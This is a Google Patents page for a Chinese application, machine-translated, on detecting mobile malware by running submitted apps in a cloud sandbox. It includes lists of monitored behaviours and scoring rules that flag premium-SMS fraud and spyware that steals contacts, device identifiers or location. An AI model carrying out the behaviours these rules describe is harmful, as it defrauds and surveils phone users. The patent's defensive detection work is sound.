CN102082802A - Behavior-based mobile terminal security protection system and method - Google Patents
Behavior-based mobile terminal security protection system and method Download PDFInfo
- Publication number
- CN102082802A CN102082802A CN2011100487216A CN201110048721A CN102082802A CN 102082802 A CN102082802 A CN 102082802A CN 2011100487216 A CN2011100487216 A CN 2011100487216A CN 201110048721 A CN201110048721 A CN 201110048721A CN 102082802 A CN102082802 A CN 102082802A
- Authority
- CN
- China
- Prior art keywords
- behavior
- software program
- software
- server
- terminal equipment
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Abstract
The invention provides a program behavior-based mobile equipment security protection system and a program behavior-based mobile equipment security protection method. The program behavior-based mobile equipment security protection system comprises terminal equipment and a server, wherein the server comprises a receiving module, a distribution module, a detection module and a report generation module; the receiving module is used for receiving a software program from the terminal equipment; the distribution module is used for distributing the received software program to a simulator in cloud consisting of processors; the detection module is used for detecting and recording the execution behaviors of the software program or other files run in an hourglass model of the server; and the report generation module is used for evaluating the friendliness or hazard level of the software program or the other files according to the execution behaviors of the software program in the hourglass model, and providing an analysis report for the terminal equipment.
Description
Technical field
The application relates to the safe practice of mobile terminal device, more specifically, the present invention relates to a kind of security protection system and method for the portable terminal based on program behavior, wherein, mobile terminal device involved in the present invention includes but not limited to mobile communication equipment (such as cell-phone, smart phone), portable entertainment device (such as the panel computer or the audio-visual playback equipment of the PS series of the GALAXY of the IPAD of Apple, Samsung, Sony) or the like.
Background technology
In the checking and killing virus field, mainly comprise two kinds of technology at present.First kind is firewall technology, is a kind of safeguard measure of being taked at Internet network unsafe factor.Fire compartment wall is the internal network barrier that is used for stopping outside unsafe factor influence, and its purpose prevents the unwarranted visit of external network user exactly.Fire compartment wall mainly is made up of service access policy, verification tool, packet filtering and 4 parts of application gateway, is a software or the hardware between the network that is connected in computer and it.Whether the monitored object of fire compartment wall is a port and protocol, need the own setting of user to allow to pass through, and requires the user that system is had professional familiarity, and the granularity of monitoring is too big, is difficult to accurate differentiation.
Second kind of checking and killing method is based on the virus definition storehouse and finishes, and this method need be set up large-scale Malware monitoring system, and needs the huge manpower and materials of cost to define, make and safeguard the virus definition storehouse.In addition, after this antivirus software only captures Virus Sample, just can extract the condition code of virus, and can't take precautions against for emerging unknown virus, virus base also needs real-time update, upgrading to follow the tracks of immediately.Along with the index multiplication of Malware quantity is long, this method more and more can not satisfy the needs of practical application.
For the moving communicating field such as mobile phone, present Malware checking and killing method is all come from computer realm study, also has the problem identical with computer realm.In addition because there are a great difference in character and the Malware on the computer of the Malware on the mobile phone, the Malware on the mobile phone on defining be incomplete same on the computer, Malware is difficult to propagate on a large scale on mobile phone.The purpose of the Malware on the mobile phone mainly be steal personal information and information, steal Bank Account Number, criminal offence such as tap phone.Directly carry out killing at the portable terminal such as mobile phone, too high to the disposal ability and the memory space requirement of terminal equipment, under present technology, killing efficient and accuracy are all lower.
Summary of the invention
For overcoming above-mentioned defective of the prior art, the invention provides a kind of security protection system and method for the mobile device based on program behavior.
According to an aspect of the present invention, a kind of security protection system of the mobile communication equipment based on program behavior is provided, comprise terminal equipment and server, it is characterized in that, described server comprises receiver module, distribution module, detection module report generation module, wherein, receiver module is used for receiving software program or the alternative document that sends from terminal equipment; Distribution module is used for one of them the simulator that the software program that will be received or alternative document are distributed to " cloud " be made up of processor; Detection module is used for detecting and be recorded in the software program that the hourglass model of server moves or the act of execution of alternative document; The report generation module is used for the behavior carried out at the hourglass model according to software program or alternative document, and the close friend or the extent of injury of evaluation software program or alternative document provide analysis report to terminal equipment.
According to another aspect of the present invention, provide a kind of safety protecting method of the mobile device based on program behavior, comprising: step 1), terminal equipment receive from after the software program of application server or the link, are transmitted to server; Wherein, terminal equipment is manually given server automatically or according to the degree of awareness and confidence level for this document; Step 2), server receives software program or the alternative document that sends from terminal equipment, and the software program that received or alternative document are distributed to one of them simulator in " cloud " be made up of processor; Step 3), server detect and are recorded in the software program that moves in the hourglass model or the act of execution of alternative document; The behavior that step 4), server are carried out in the hourglass model according to software program or alternative document, the close friend or the extent of injury of evaluation software program or alternative document provide analysis report to terminal equipment.
The application's system and method can according to program behavior judge in advance and the killing mobile phone on Malware, and can stop the installation of Malware on mobile phone, thereby initiatively prevent the injury of Malware the user.Use initiatively defense function, play the effect of anti-" fire ", save and set up and safeguard the expense in virus definition storehouse; Improve the efficient and the accuracy of malware detection, Malware is eliminated in cradle.
Description of drawings
Fig. 1 is the structural representation according to the security protection system of mobile device of the present invention;
Fig. 2 is the technology for detection report schematic diagram of system;
The analysis report schematic diagram that Fig. 3 generates for system.
As shown in the figure, in order clearly to realize the structure or the method for embodiments of the invention, specific virus and application apparatus have been marked in the drawings, but this only needs for signal, be not that intention limits the invention in this specific program and the environment, according to concrete needs, those of ordinary skill in the art can adjust these environment, revise, and adjustment of being carried out and modification still are included in the scope of accompanying Claim.
Embodiment
Below in conjunction with the drawings and specific embodiments a kind of security protection system and method based on program behavior provided by the invention is described in detail.
In the following description, a plurality of different aspects of the present invention will be described, yet, for those skilled in the art, can only utilize more of the present invention or entire infrastructure or flow process are implemented the present invention.For the definition of explaining, set forth specific number, configuration and order, but clearly, do not had also can to implement the present invention under the situation of these specific detail.In other cases, in order not obscure the present invention, will no longer be described in detail for some well-known features.
Generally speaking, as shown in Figure 1, the security protection system of a kind of mobile device based on program behavior provided by the invention comprises terminal equipment 100 and server 200, server comprises receiver module 201, is used for expecting that from terminal equipment 100 or terminal equipment the source program server end that downloads receives this program.
Terminal equipment 100 is meant via communications facility and operator's equipment or the mutual equipment of application server, terminal equipment 100 is arranged on the place that makes things convenient for that utilizes communications facility to connect work with server usually, it is mainly combined by communication interface control device and input/output unit special-purpose or that select, and mobile terminal device is not limited by the region, and is more flexible.Terminal equipment of the present invention includes but not limited to mobile communication equipment (such as cell-phone, smart phone), portable entertainment device (such as the IPAD of Apple, the GALAXY of Samsung, the PS series of Sony) or the like.
The application's terminal equipment 100 has receiving port and transmit port, and receiving port is used to receive the software program from application server, and the software program that transmit port is used for being received sends to server 200.The application server here includes but not limited to: provide software download application server, carrier server, with terminal equipment carry out session conversation server, provide the application server of remote support and the static state and the dynamic state server of other types to terminal equipment.
Generally speaking, as shown in Figure 1, the application's server 200 comprises receiver module 201, distribution module 202, detection module 203, comparison module 204 and report generation module 205.Wherein, receiver module 201 is used for receiving software program or the alternative document that sends from terminal equipment 100; Distribution module 202 is used for one of them the simulator that the software program that will be received or alternative document are distributed to " cloud " be made up of processor; Detection module 203 is used for detecting the software program that the hourglass model at server 200 moves or the behavior of alternative document; Comparison module 204 is used for the behavior of the implementation of detected this software program or alternative document and the behavior storehouse in the server 200 are compared, know it whether is existing behavior, comparison module 204 also directly with the software program that received or other software directly and the software in the behavior storehouse carry out static state and compare; Report generation module 205 is used for the behavior carried out at the hourglass model according to software program or alternative document, and the close friend or the extent of injury of evaluation software program or alternative document provide analysis report to terminal equipment 100.
Further, describe the structure and the concrete running of security protection system in detail with reference to figure 1.Terminal equipment 100 actives or passive after above-mentioned application server receives installation file or executable file, can automatically the file that is received be sent to the application's server 200, perhaps the user is according to the server 200 that self manually the file that is received is sent to the application for the degree of awareness and the confidence level of this document.For the cellphone subscriber who uses Android (Andriod) operating system, when receiving .apk file, executable file .exe or arbitrary alternative document, active or the manual server 200 that this document is sent to the application, before not receiving the analysis report of feedback information from the application's server 200, do not move this document, and adopt denial measure for the self-operating behavior of this document.
Receiver module 201 is used for receiving software program or the alternative document that sends from terminal equipment 100.Receiver module 201 uses polling mechanisms or intercepts mechanism, the information that the self terminal equipment 100 of collecting sends, and will received file or program related with these terminal equipment 100 foundation, obtain the facility information of this terminal equipment 100.
Distribution module 202 is used for one of them the simulator that the software program that will be received or alternative document are distributed to " cloud " be made up of processor.The application's server 200 is at multitask, multi-user's work, and the software simulation execution environment of self setting comprises the high in the clouds that is made of a plurality of processors, and received software program is distributed according to the idle degree of the processor in high in the clouds.Such Simulation execution environment comprises virtual machine, simulator and hourglass model, and virtual machine is used for pseudo-terminal equipment, and simulator is used for simulating the operation of institute's receiving software or executable file, and hourglass is used for knowing the implementation and the result of executable file.
Detection module 203 is used for detecting the software program that the hourglass model at server 200 moves or the behavior of alternative document.Carry out the virtual execution of Malware at server 200 ends, the software of malicious act is installed in the environment of virtual execution, generate the hourglass of the environment of virtual execution, obtain the behavior and the trace information of this software.Particularly, this software of operation on virtual machine, substep is carried out each operating procedure of this software, in the implementation of each operating procedure, the memory location of the dateout of monitoring hourglass and expectation visit, sensitive position and sensitive document place are set the control point, when the carry out desired of this software is visited these positions or expectation when reading these files, this control point will trigger automatically, report the behavior to detection module 203, and read operation and memory location are sent to report generation module 205.
For example, for common employed mobile phone, the behavior that is monitored comprises: send note and multimedia message, telephone directory on visit mobile phone or the SIM card is created network and is connected (GPRS, EDGE, 3G etc.), the visit bluetooth is visited infrared, the visit WLAN (wireless local area network), visit GPS terminal, visit action sensor, visit camera, the visit microphone is visited other sensitive datas.
In addition, according to the performed behavior of installation process and installation back of install software, can define the extent of injury of concrete action.With the sending short message by mobile phone breath is example, can think that following action has potential hazard: under the table send note on the backstage, people outside the telephone directory sends short messages, the number of the business of sending short messages increment provider, send note to contact persons all in the telephone directory, the frequency that sends note is very high, and 11 send note between the 6:00 AM at night.
The monitoring activity of being carried out for for mobile phone terminal equipment is shown below, classifies these behaviors as emphasis monitoring behavior and dangerous act:
The inquiry address list
Insert the contact person
The deletion contact person
Upgrade the contact person
5) Send DataSMS to XXXXXXX sends data message to XXXXXX
6) Send SMS to XXXXXXX Context:MMMMMM sends note to XXXXX, and content is MMMMMM
Inquire about IMSI number
Enquiring telephone number
The inquiry IMEI number
Inquire about SIM number
Http connects
12) Define URL:XXXXXXXX definition URL link address XXXXXX
13) Define URI:XXXXXXXX definition URI link address XXXXXX
14) (XXXX is that the file beginning is the system file address, and the http beginning is the network address, and start-up routine can define file address accesses network can define the http address)
URL connects
Http Client accesses network
Open bluetooth
18) Open Camera Preview opens the camera preview
Report generation module 205 is used for the behavior carried out at the hourglass model according to software program or alternative document, and the close friend or the extent of injury of evaluation software program or alternative document provide analysis report to terminal equipment.Wherein, by analyzing act of execution and the trace information that above-mentioned detection module is known, these behaviors and information are evaluated according to the objective extent of injury; According to the evaluation score, judge whether this software is Malware.Particularly, can utilize the Bayesian decision system, analysis behavior and action sequence provide the safety grading of this behavior, judge whether this software is Malware.
And can provide effective protectiving scheme according to its extent of injury, to the prevention of harmful act two kinds of implementations can be arranged, based on the system and the expert system of strategy.For the system based on strategy, which behavior the keeper can define is forbidden, and which behavior is allowed to.Is with the short message example, the rule that can be defined as follows: allow to send note to value added service provider? allow in backstage transmission note? perhaps other.For expert system, can use expertise and domain knowledge to judge malicious act, and each behavior provided certain mark (0-9, number is big more represents that more danger is big more), with the note is that example provides following rule and mark: high-frequency ground sent note, as 1 minute 10------mark: 3; Send the number of note, as------marks: 6 such as 10086,1066907703 to value added service provider; Send note to unacquainted people, and frequency is very high------mark: 7; Send the number of note to value added service provider, and frequency is very high------mark: 7; 11 send note number------marks: 9 to value added service provider to high-frequency ground between the 6:00 AM at night.
Order for calling API can be defined as follows rule: if these API have revised registration table, visited user's personal information, and set up the network connection, just can think that it is a spyware of stealing personal information.For the hardware device of visit mobile phone, the order that is defined as follows: the function of visit GPS, the visit action sensor, and set up the network connection, if satisfied this order, just can think that this software is the spyware of location.
Fig. 2 illustrates the analysis report of carrying out the application software that a mobile phone terminal equipment sent, the cellphone subscriber visits after the network linking, this network linking sends a file automatically or links to terminal equipment, this terminal equipment sends to this link the application's server 200, send to the application's server 200 after perhaps this document being downloaded, the application's server 200 moves this document step by step in this locality, obtains the information of this document.Among the figure, the right side is a running, and a power consumption parameter and visit situation are shown, and provides executive button; The access links that carry out for each performed operation of step of this document in the left side, the information of transmission, and for bigger technology spanned file, can carry out logic integration, the generation technique report to these files.
Fig. 3 illustrates the safety message that is produced, and according to the described technical report of Fig. 2, these behavioural characteristics is analyzed, and according to the above-mentioned objective standard of comparison and the extent of injury, gives the safety grading of outfile, and report back is given the user of terminal equipment.As shown in Figure 3, the file for the execution of Fig. 2 according to the analysis to its technical report, provides the file that this software belongs to degree of danger.
Comparison module 204 is used for the behavior of the implementation of detected this software program or alternative document and the behavior storehouse in the server are compared, and knows whether be existing behavior.Comparison module 204 also directly with the software program that received or other software directly and the software in the behavior storehouse carry out the static state comparison.
When the report generation module provides the analysis-by-synthesis report for a file after, this document can be preserved, afterwards when new file arrives, before can detecting at the operation action of execute file, file attribute of this document and the file of being preserved are carried out the static state comparison, to improve operational efficiency.
In another embodiment of the application, a kind of safety protecting method of the mobile device based on program behavior is provided, the environment of this method operation comprises terminal equipment 100 and server 200, server comprises receiver module 201, is used for expecting that from terminal equipment or terminal equipment the source program server end that downloads receives this program.
Terminal equipment is meant via communications facility and operator's equipment or the mutual equipment of application server, terminal equipment is arranged on the place that makes things convenient for that utilizes communications facility to connect work with server usually, it is mainly combined by communication interface control device and input/output unit special-purpose or that select, and mobile terminal device is not limited by the region, and is more flexible.Terminal equipment of the present invention includes but not limited to mobile communication equipment (such as cell-phone, smart phone), portable entertainment device (such as the IPAD of Apple, the GALAXY of Samsung, the PS series of Sony) or the like.
Terminal equipment 100 has receiving port and transmit port, and receiving port is used to receive the software program from application server, and the software program that transmit port is used for being received sends to server 200.The application server here includes but not limited to: provide software download application server, carrier server, with terminal equipment carry out session conversation server, provide the application server of remote support and the static state and the dynamic state server of other types to terminal equipment.
Generally speaking, the application's method comprises: software program or alternative document that step 10), reception send from terminal equipment; Step 20), the software program that received or alternative document are distributed to one of them simulator in " cloud " formed by processor; Step 30), detect the software program in the hourglass model of server, move or the behavior of alternative document; Step 40), according to the behavior that software program or alternative document are carried out in the hourglass model, the close friend or the extent of injury of evaluation software program or alternative document provide analysis report to terminal equipment.This method also comprises: behavior in the implementation of detected software program or alternative document and the behavior storehouse in the server are compared, know it whether is existing behavior, perhaps directly with the software program that received or other software directly and the software in the behavior storehouse carry out the static state comparison.
Further, describe the concrete running of safety protecting method in detail with reference to figure 1.Terminal equipment 100 actives or passive after above-mentioned application server receives installation file or executable file, can automatically the file that is received be sent to the application's server 200, perhaps the user is according to the server that self manually the file that is received is sent to the application for the degree of awareness and the confidence level of this document.For the cellphone subscriber who uses Android operating system, when receiving .apk installation file, executable file or arbitrary alternative document, active or the manual server that this document is sent to the application, before not receiving the analysis report of feedback information from the application's server, do not move this document, and adopt denial measure for the self-operating behavior of this document.
In the step 10), use polling mechanism or intercept mechanism, the information that the self terminal equipment of collecting sends, and will received file or program related with these terminal equipment 100 foundation, obtain the facility information of this terminal equipment 100.
Step 20) in, the software program that received or alternative document are distributed to one of them simulator in " cloud " be made up of processor.The application's server is at multitask, multi-user's work, and the software simulation execution environment of self setting comprises the high in the clouds that is made of a plurality of processors, and distribution is distributed according to the idle degree of the processor in high in the clouds received software program with this software program.Such Simulation execution environment comprises virtual machine, simulator, hourglass model, and virtual machine is used for pseudo-terminal equipment, and simulator is used for simulating the operation of institute's receiving software or executable file, and hourglass is used for knowing the implementation and the result of executable file.
Step 30) in, the software program that detection moves in the hourglass model of server or the behavior of alternative document.Carry out the virtual execution of Malware at server end, the software of malicious act is installed in the environment of virtual execution, generate the hourglass of the environment of virtual execution, obtain the behavior and the trace information of this software.Particularly, this software of operation on virtual machine, substep is carried out each operating procedure of this software, in the implementation of each operating procedure, the control point is set with sensitive position and sensitive document place in the memory location of the dateout of monitoring hourglass and expectation visit, when the carry out desired of this software is visited these positions or expectation when reading these files, this control point will trigger automatically, reports the behavior to detection module, and read operation and memory location are sent to the report generation module.
For example, for common employed mobile phone, the behavior that is monitored comprises: send note and multimedia message, telephone directory on visit mobile phone or the SIM card is created network and is connected (GPRS, EDGE, 3G etc.), the visit bluetooth is visited infrared, the visit WLAN (wireless local area network), visit GPS terminal, visit action sensor, visit camera, the visit microphone is perhaps visited other sensitive datas.
In addition, according to performed behavior, can define the extent of injury of concrete action.With the sending short message by mobile phone breath is example, can think that following action has potential hazard: under the table send note on the backstage, people outside the telephone directory sends short messages, the number of the business of sending short messages increment provider, send note to contact persons all in the telephone directory, the frequency that sends note is very high, and 11 send note between the 6:00 AM at night.
Step 40) in, according to the behavior that software program or alternative document are carried out in the hourglass model, the close friend or the extent of injury of evaluation software program or alternative document provide analysis report to terminal equipment.Wherein, by analyzing act of execution and the trace information that above-mentioned detection module is known, these behaviors and information are evaluated according to the objective extent of injury; According to the evaluation score, judge whether this software is Malware.Particularly, can utilize the Bayesian decision system, analysis behavior and action sequence provide the safety grading of this behavior, judge whether this software is Malware.
Further, can provide effective protectiving scheme, to the prevention of harmful act two kinds of implementations can be arranged, based on the system and the expert system of strategy according to its extent of injury.For the system based on strategy, which behavior the keeper can define is forbidden, and which behavior is allowed to.With the short message is example, the rule that can be defined as follows: whether allow to send note to value added service provider, whether allow to send note on the backstage, perhaps other.For expert system, can use expertise and domain knowledge to judge malicious act, and each behavior provided certain mark (0-9, number is big more represents that more danger is big more), with the note is that example provides following rule and mark: high-frequency ground sent note, as 1 minute 10------mark: 3; Send the number of note, as------marks: 6 such as 10086,1066907703 to value added service provider; Send note to unacquainted people, and frequency is very high------mark: 7; Send the number of note to value added service provider, and frequency is very high------mark: 7; 11 send note number------marks: 9 to value added service provider to high-frequency ground between the 6:00 AM at night.
Order for calling API can be defined as follows rule: if these API have revised registration table, visited user's personal information, and set up the network connection, just can think that it is a spyware of stealing personal information.For the hardware device of visit mobile phone, the order that is defined as follows: the function of visit GPS, the visit action sensor, and set up the network connection, if satisfied this order, just can think that this software is the spyware of location.
In addition, step 50) in, provide after the analysis-by-synthesis report for a file, this document can be preserved, afterwards when new file arrives, can be before the operation action of execute file detect, the file attribute of this document advanced the file of being preserved is carried out static state comparison, with the raising operational efficiency.
It should be noted that at last, above embodiment is only in order to describe technical scheme of the present invention rather than the present technique method is limited, the present invention can extend to other modification, variation, application and embodiment on using, and therefore thinks that all such modifications, variation, application, embodiment are in spirit of the present invention and teachings.
Claims (15)
1. security protection system based on the terminal equipment of program behavior, comprise terminal equipment and server, it is characterized in that, described server comprises receiver module, distribution module, detection module and report generation module, wherein, receiver module is used for receiving software program or other execute files that sends from terminal equipment; Distribution module is used for one of them the simulator that the software program that will be received or alternative document are distributed to " cloud " be made up of processor; Detection module is used for detecting and be recorded in the software program that the hourglass model of server moves or the act of execution of alternative document; The report generation module is used for the behavior carried out at the hourglass model according to software program or alternative document, and the extent of injury of evaluation software program or alternative document provides analysis report to terminal equipment.
2. the described system of claim 1 is characterized in that, also comprises comparison module, is used for the behavior of the implementation of detected this software program or alternative document and the behavior storehouse in the server are compared, and knows whether be existing behavior; Perhaps directly with the software program that received or other software directly and the software in the behavior storehouse carry out the static state comparison.
3. the described system of claim 1 is characterized in that, described detection module is the install software program in the environment of virtual execution, generates the hourglass of the environment of virtual execution, obtains the behavior and the trace information of the installation process and the implementation of this software.
4. the described system of claim 3 is characterized in that, described detection module moves this software program on virtual machine, substep is carried out each operating procedure of this software, the control point is set in the memory location of the dateout of monitoring hourglass and expectation visit, collects the triggering behavior for the control point.
5. the described system of claim 1, it is characterized in that, the software simulation execution environment of described system comprises the high in the clouds that is made of a plurality of processors, and described distribution module is distributed according to the idle degree of the processor in high in the clouds received software program with this software program; This Simulation execution environment comprises: be used for the virtual machine of pseudo-terminal equipment, be used for simulating the simulator of the operation of institute's receiving software program or executable file, be used for the hourglass of act of execution of monitoring software file.
6. the described system of claim 1, it is characterized in that described receiver module uses polling mechanism or intercepts mechanism, the information that the self terminal equipment of collecting sends, and received file or software program is related with this terminal equipment foundation, and obtain this device information of terminal.
7. the described system of claim 6, it is characterized in that, described terminal equipment has receiving port and transmit port, and receiving port is used to receive the software program from various application servers, and the software program that transmit port is used for being received sends to described server; Wherein, described terminal equipment sends to described server with the file that is received automatically, and perhaps the user manually sends to described server with the file that is received according to self for the degree of awareness and the confidence level of this document.
8. the described system of claim 1 is characterized in that, installation behavior, act of execution and trace information that described report generation module is known by the analyzing and testing module are evaluated according to the objective extent of injury these behaviors and information; According to the evaluation score, judge whether this software is Malware; Perhaps utilize the Bayesian decision system, analysis behavior and action sequence provide the safety grading of this behavior, judge whether this software is Malware.
9. the described system of claim 8 is characterized in that, described report generation module provides system or expert system based on strategy according to the extent of injury of software program; Wherein, for the system based on strategy, which behavior the keeper can define is forbidden, and which behavior is allowed to, and for expert system, uses expertise and domain knowledge to judge malicious act, and each behavior is provided certain mark.
10. safety protecting method based on the terminal equipment of program behavior comprises:
Step 1), terminal equipment receive from after the software program of application server or the link, are transmitted to server; Wherein, terminal equipment is manually given server automatically or according to the degree of awareness and confidence level for this document;
Step 2), server receives software program or the alternative document that sends from terminal equipment, and the software program that received or alternative document are distributed to one of them simulator in " cloud " be made up of processor;
Step 3), server detect and are recorded in the software program that moves in the hourglass model or installation behavior, act of execution or the trace information of alternative document;
The behavior that step 4), server are installed or carried out in the hourglass model according to software program or alternative document, the close friend or the extent of injury of evaluation software program or alternative document provide analysis report to terminal equipment.
11. the described method of claim 10 also comprises: behavior in the implementation of detected this software program or alternative document and the behavior storehouse in the server are compared, know whether be existing behavior; Perhaps directly with the software program that received or other software directly and the software in the behavior storehouse carry out the static state comparison.
12. the described method of claim 10, wherein, in the step 3), install software program in the environment of virtual execution generates the hourglass of the environment of virtual execution, obtains installation behavior, act of execution and the trace information of this software; Wherein, this software of operation on virtual machine, substep is carried out each operating procedure of this software, and the control point is set in the memory location of the dateout of monitoring hourglass and expectation visit, collects the triggering behavior for the control point.
13. the described method of claim 10, step 2) in, the software simulation execution environment comprises the high in the clouds that is made of a plurality of processors, server is distributed according to the idle degree of the processor in high in the clouds received software program with this software program; This Simulation execution environment comprises: be used for the virtual machine of pseudo-terminal equipment, be used for simulating the simulator of the operation of institute's receiving software or executable file, be used for the hourglass of implementation of monitoring software file.
14. the described method of claim 10, in the step 4), server is evaluated according to the objective extent of injury these behaviors and information by analyzing act of execution and the trace information of being known; According to the evaluation score, judge whether this software is Malware; Perhaps utilize the Bayesian decision system, analysis behavior and action sequence provide the safety grading of this behavior, judge whether this software is Malware.
15. the described method of claim 14, in the step 4), server provides system or expert system based on strategy according to the behavior extent of injury; Wherein, for the system based on strategy, which behavior the keeper defines is forbidden, and which behavior is allowed to; For expert system, use expertise and domain knowledge to judge malicious act, and each behavior is provided certain mark.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2011100487216A CN102082802A (en) | 2011-03-01 | 2011-03-01 | Behavior-based mobile terminal security protection system and method |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2011100487216A CN102082802A (en) | 2011-03-01 | 2011-03-01 | Behavior-based mobile terminal security protection system and method |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN102082802A true CN102082802A (en) | 2011-06-01 |
Family
ID=44088554
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN2011100487216A Pending CN102082802A (en) | 2011-03-01 | 2011-03-01 | Behavior-based mobile terminal security protection system and method |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN102082802A (en) |
Cited By (28)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102254120A (en) * | 2011-08-09 | 2011-11-23 | 成都市华为赛门铁克科技有限公司 | Method, system and relevant device for detecting malicious codes |
| CN102331946A (en) * | 2011-09-28 | 2012-01-25 | 宇龙计算机通信科技(深圳)有限公司 | Method and system for installing application program |
| CN102547713A (en) * | 2011-12-21 | 2012-07-04 | 成都三零瑞通移动通信有限公司 | Anti-activating method aiming at X undercover software |
| CN102694817A (en) * | 2012-06-08 | 2012-09-26 | 奇智软件(北京)有限公司 | Method, device and system for identifying abnormality of network behavior of program |
| CN103136476A (en) * | 2011-12-01 | 2013-06-05 | 深圳市证通电子股份有限公司 | Mobile intelligent terminal malicious software analysis system |
| CN103218566A (en) * | 2013-01-25 | 2013-07-24 | 江南大学 | Active defense system based on Android platform software behavior detection |
| CN103246846A (en) * | 2013-04-24 | 2013-08-14 | 北京网秦天下科技有限公司 | Method and device for detecting safety of customized ROM (read only memory) |
| CN103259806A (en) * | 2012-02-15 | 2013-08-21 | 深圳市证通电子股份有限公司 | Android intelligent terminal application program security detection method and system |
| CN103279708A (en) * | 2012-12-28 | 2013-09-04 | 武汉安天信息技术有限责任公司 | Method and system for monitoring and analyzing mobile terminal malicious code behaviors |
| CN103309790A (en) * | 2013-07-04 | 2013-09-18 | 福建伊时代信息科技股份有限公司 | Method and device for monitoring mobile terminal |
| CN103618626A (en) * | 2013-11-28 | 2014-03-05 | 北京奇虎科技有限公司 | Method and system for generating safety analysis report on basis of logs |
| CN103793209A (en) * | 2012-10-26 | 2014-05-14 | 珠海市君天电子科技有限公司 | Method and system for modifying Android program execution flow |
| CN103916434A (en) * | 2013-01-04 | 2014-07-09 | 中兴通讯股份有限公司 | Application installation method, device and system |
| CN103927156A (en) * | 2013-01-16 | 2014-07-16 | 珠海市君天电子科技有限公司 | Sample behavior triggering method and device |
| CN104135479A (en) * | 2014-07-29 | 2014-11-05 | 腾讯科技(深圳)有限公司 | Cloud real-time defense method and system |
| CN104704502A (en) * | 2012-10-01 | 2015-06-10 | 微软公司 | Using trusted devices to augment location-based account protection |
| CN104850775A (en) * | 2014-02-14 | 2015-08-19 | 北京奇虎科技有限公司 | Method and device for assessing safety of application program |
| WO2015120756A1 (en) * | 2014-02-14 | 2015-08-20 | 北京奇虎科技有限公司 | Method and device for identifying security of application process |
| CN105279432A (en) * | 2015-10-12 | 2016-01-27 | 北京金山安全软件有限公司 | Software monitoring processing method and device |
| CN105683988A (en) * | 2013-09-27 | 2016-06-15 | 迈克菲公司 | Managed software remediation |
| CN106055976A (en) * | 2016-05-16 | 2016-10-26 | 杭州华三通信技术有限公司 | Document detection method and sandbox controller |
| CN103942493B (en) * | 2014-03-28 | 2017-02-15 | 北京工业大学 | Intelligent active defensive system and method under Window |
| CN109361646A (en) * | 2018-08-23 | 2019-02-19 | 广东电网有限责任公司信息中心 | Network security monitoring and cognitive method in a kind of application of mobile interchange |
| CN109614159A (en) * | 2017-09-30 | 2019-04-12 | 北京国双科技有限公司 | Plan target distribution, introduction method and device |
| CN109726551A (en) * | 2017-10-31 | 2019-05-07 | 武汉安天信息技术有限责任公司 | The methods of exhibiting and system of preceding bad behavior are installed in a kind of application |
| CN109918173A (en) * | 2019-03-06 | 2019-06-21 | 苏州浪潮智能科技有限公司 | Virtual machine health examination method and system based on openstack |
| US10817611B1 (en) | 2019-12-18 | 2020-10-27 | Capital One Services, Llc | Findings remediation management framework system and method |
| CN112099802A (en) * | 2020-09-18 | 2020-12-18 | 腾讯科技(深圳)有限公司 | Component identification method and device of application program |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20060179484A1 (en) * | 2005-02-09 | 2006-08-10 | Scrimsher John P | Remediating effects of an undesired application |
| CN101924762A (en) * | 2010-08-18 | 2010-12-22 | 奇智软件(北京)有限公司 | Cloud security-based active defense method |
| CN101959193A (en) * | 2010-09-26 | 2011-01-26 | 宇龙计算机通信科技(深圳)有限公司 | Information safety detection method and a mobile terminal |
-
2011
- 2011-03-01 CN CN2011100487216A patent/CN102082802A/en active Pending
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20060179484A1 (en) * | 2005-02-09 | 2006-08-10 | Scrimsher John P | Remediating effects of an undesired application |
| CN101924762A (en) * | 2010-08-18 | 2010-12-22 | 奇智软件(北京)有限公司 | Cloud security-based active defense method |
| CN101959193A (en) * | 2010-09-26 | 2011-01-26 | 宇龙计算机通信科技(深圳)有限公司 | Information safety detection method and a mobile terminal |
Cited By (39)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102254120A (en) * | 2011-08-09 | 2011-11-23 | 成都市华为赛门铁克科技有限公司 | Method, system and relevant device for detecting malicious codes |
| CN102254120B (en) * | 2011-08-09 | 2014-05-21 | 华为数字技术(成都)有限公司 | Method, system and relevant device for detecting malicious codes |
| US9465941B2 (en) | 2011-08-09 | 2016-10-11 | Huawei Technologies Co., Ltd. | Method, system, and apparatus for detecting malicious code |
| CN102331946B (en) * | 2011-09-28 | 2015-02-11 | 宇龙计算机通信科技(深圳)有限公司 | Method and system for installing application program |
| CN102331946A (en) * | 2011-09-28 | 2012-01-25 | 宇龙计算机通信科技(深圳)有限公司 | Method and system for installing application program |
| CN103136476A (en) * | 2011-12-01 | 2013-06-05 | 深圳市证通电子股份有限公司 | Mobile intelligent terminal malicious software analysis system |
| CN102547713A (en) * | 2011-12-21 | 2012-07-04 | 成都三零瑞通移动通信有限公司 | Anti-activating method aiming at X undercover software |
| CN103259806A (en) * | 2012-02-15 | 2013-08-21 | 深圳市证通电子股份有限公司 | Android intelligent terminal application program security detection method and system |
| CN103259806B (en) * | 2012-02-15 | 2016-08-31 | 深圳市证通电子股份有限公司 | The method and system of Android intelligent terminal application security detection |
| CN102694817B (en) * | 2012-06-08 | 2016-08-03 | 北京奇虎科技有限公司 | The whether abnormal method of the network behavior of a kind of recognizer, Apparatus and system |
| CN102694817A (en) * | 2012-06-08 | 2012-09-26 | 奇智软件(北京)有限公司 | Method, device and system for identifying abnormality of network behavior of program |
| WO2013181982A1 (en) * | 2012-06-08 | 2013-12-12 | 北京奇虎科技有限公司 | Method, device and system for identifying abnormality of network behavior of program |
| CN104704502A (en) * | 2012-10-01 | 2015-06-10 | 微软公司 | Using trusted devices to augment location-based account protection |
